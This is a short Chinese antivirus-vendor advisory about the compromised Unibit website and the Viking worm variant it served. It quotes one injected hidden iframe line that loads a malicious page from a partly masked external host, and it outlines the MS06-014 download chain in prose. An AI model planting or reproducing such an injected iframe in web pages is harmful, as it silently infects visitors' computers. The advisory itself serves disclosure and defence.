近日,江民公司反病毒中心监测到,知名数码产品公司优百特(Unibit)官方网站大部分网页均带有恶意代码,没有打好系统漏洞补丁的电脑用户点击这些网页时,就会感染“威金”蠕虫的最新变种。“威金”蠕虫会感染可执行文件,并能通过局域网传播,严重的会导致局域网瘫痪,病毒还会下载其他若干木马程序,黑客可以借此远程控制中毒电脑。
江民反病毒专家介绍,经过对网页源代码分析,在优百特首页(http://www.unibit.***.**/default.asp)和产品中心页面(http://www.unibit.***.**/products_list.asp)等多个页面尾部均包含对恶意网页的引用代码:
<iframe src=http://www.kr***.com/worm.htm width=0 height=0></iframe>
该恶意代码引用的恶意网页会转链另一恶意网站,而后者包含经过加密的恶意VBScript脚本,该脚本利用微软MS06-014漏洞,自动下载病毒文件名为worm.exe“威金”蠕虫。
反病毒专家介绍,worm.exe是威金蠕虫的最新变种,大小68K字节,文件显示为熊猫样的图标。运行后会遍历并感染正常的可执行文件,通过共享文件夹及IPC共享传播。该蠕虫还会下载worm.txt文件,该文件是一个地址列表,包含多个木马及后门程序的网址,威金蠕虫会下载并执行列表中指定的5个木马后门,黑客利用上述木马可以远程操控中毒电脑,严重侵害用户的电脑数据安全。
针对该病毒,江民公司已经及时升级了病毒库,江民杀毒软件KV系列产品用户请立即升级到12月21日病毒库,即可查杀上述所有蠕虫、木马和后门病毒,确保电脑和数据安全。